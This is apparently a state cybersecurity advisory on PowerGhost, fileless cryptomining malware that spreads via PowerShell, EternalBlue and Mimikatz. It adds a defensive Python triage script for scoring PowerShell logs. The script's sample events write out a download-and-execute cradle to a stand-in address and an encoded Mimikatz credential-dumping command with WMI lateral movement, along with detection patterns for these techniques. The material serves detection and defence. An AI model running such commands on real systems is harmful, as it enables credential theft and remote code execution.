Fileless Malware Targeting Corporate Systems

Threat actors are deploying a new fileless malware, dubbed PowerGhost, against corporate networks around the world. It gains a foothold on a single system in a business network and then spreads to other workstations and servers using PowerShell, the EternalBlue exploit, and Mimikatz. Infected devices are used to mine cryptocurrency, so the attackers' profit grows with every additional machine they compromise. The initial foothold comes from an exploit or from remote administration tools such as Windows Management Instrumentation (WMI). During infection, a one-line PowerShell script runs and downloads the cryptocurrency miner, Mimikatz, EternalBlue exploit shellcode, and a reflective PE injection module, so the payload is loaded directly into memory rather than written to disk as an executable, which is what makes it "fileless" and lets it evade file-based antivirus scanning. Once a machine is infected, Mimikatz harvests account credentials from it, and these credentials, together with the EternalBlue exploit, are used to move laterally and infect additional devices. The NJCCIC recommends users and administrators review SecureList's blog post for more information and keep all software patched and up-to-date to prevent the exploitation of known vulnerabilities; in particular, confirm that the MS17-010 update addressing the SMBv1 flaw exploited by EternalBlue is installed on every Windows host, and enable PowerShell script block logging so that in-memory activity of this kind is recorded.
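Because the payload never lands on disk, detection has to key on the behaviours described above: a PowerShell download cradle, reflective PE loading, Mimikatz-style credential access, WMI-driven process creation on other hosts, and the usual hidden/encoded launch flags. The following triage script is an added example, not code from the NJCCIC advisory or from the SecureList write-up, and the three event records it scores are constructed for illustration (the hostnames, the address 198.51.100.7, and the exact script text are made up and are not PowerGhost indicators). It assumes the analyst has exported PowerShell script block entries (Event ID 4104) and process creation entries (Event ID 4688) into simple dictionaries; encoded commands are base64-decoded from UTF-16LE before matching, since that is how PowerShell's -EncodedCommand is encoded.

```python
import base64
import re
from dataclasses import dataclass


def _enc(cmd: str) -> str:
    """Encode a command the way powershell.exe -EncodedCommand expects (base64 of UTF-16LE)."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode()


# Constructed sample events (hypothetical, not real telemetry): a script-block log
# with a download cradle plus reflective loading, a process-creation record whose
# encoded command dumps credentials and spawns a process on another host over WMI,
# and a benign admin one-liner that must not fire.
SAMPLE_EVENTS = [
    {"id": 4104, "host": "WS-17", "parent": "wmiprvse.exe",
     "text": "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/p.ps1'); "
             "Invoke-ReflectivePEInjection -PEBytes $miner"},
    {"id": 4688, "host": "SRV-03", "parent": "wmiprvse.exe",
     "text": "powershell.exe -nop -w hidden -enc " + _enc(
         "Invoke-Mimikatz -DumpCreds; Invoke-WmiMethod -Class Win32_Process "
         "-Name Create -ComputerName SRV-04 -ArgumentList $cradle")},
    {"id": 4104, "host": "WS-02", "parent": "explorer.exe",
     "text": "Get-ChildItem C:\\Logs | Where-Object LastWriteTime -lt (Get-Date).AddDays(-30) | Remove-Item"},
]

# Behavioural indicator categories; each is a generic pattern for the technique,
# not a signature for any specific malware family.
INDICATORS = {
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|Invoke-Expression|\bIEX\b", re.I),
    "reflective_load": re.compile(
        r"Invoke-ReflectivePEInjection|Reflection\.Assembly\]::Load|VirtualAlloc", re.I),
    "credential_theft": re.compile(r"Invoke-Mimikatz|sekurlsa|lsass", re.I),
    "wmi_lateral": re.compile(
        r"Invoke-WmiMethod.*Win32_Process.*Create|Invoke-CimMethod.*Win32_Process", re.I | re.S),
    "evasion_flags": re.compile(
        r"-nop\b|-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b|-ep\s+bypass", re.I),
}

ENC_RE = re.compile(r"-enc(?:odedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)


def expand_encoded(text: str) -> str:
    """Append the decoded form of an -EncodedCommand argument so indicators can match it."""
    m = ENC_RE.search(text)
    if not m:
        return text
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return text  # malformed payload: fall back to matching the raw line
    return text + "\n" + decoded


@dataclass
class Finding:
    host: str
    event_id: int
    categories: list          # indicator categories that matched, in INDICATORS order
    parent_wmi: bool          # launched by the WMI provider host, i.e. likely remote WMI

    def score(self) -> int:
        # One point per distinct technique, plus one if WMI spawned the process.
        return len(self.categories) + (1 if self.parent_wmi else 0)


def analyse(event: dict) -> Finding:
    text = expand_encoded(event["text"])
    cats = [name for name, rx in INDICATORS.items() if rx.search(text)]
    parent_wmi = event.get("parent", "").lower() == "wmiprvse.exe"
    return Finding(event["host"], event["id"], cats, parent_wmi)


def triage(events, threshold: int = 2):
    """Return only events that combine at least `threshold` signals; single hits are too noisy alone."""
    return [f for f in map(analyse, events) if f.score() >= threshold]


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.host} evt={f.event_id} score={f.score()} {','.join(f.categories)}"
              f"{' parent=wmiprvse' if f.parent_wmi else ''}")
```

The threshold matters: a lone `DownloadString` or `-w hidden` is common in legitimate administration, but a download cradle followed by reflective loading, or credential dumping followed by remote WMI process creation, is the chain the advisory describes. Tune the categories against your own baseline of admin scripts before alerting on them, and treat a hit whose parent is wmiprvse.exe as a lateral-movement candidate worth pivoting on to the originating host.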

Reference in this site to any specific commercial product, process, or service, or the use of any trade, firm or corporation name is for the information and convenience of the public, and does not constitute endorsement, recommendation, or favoring by the NJCCIC and the State of New Jersey.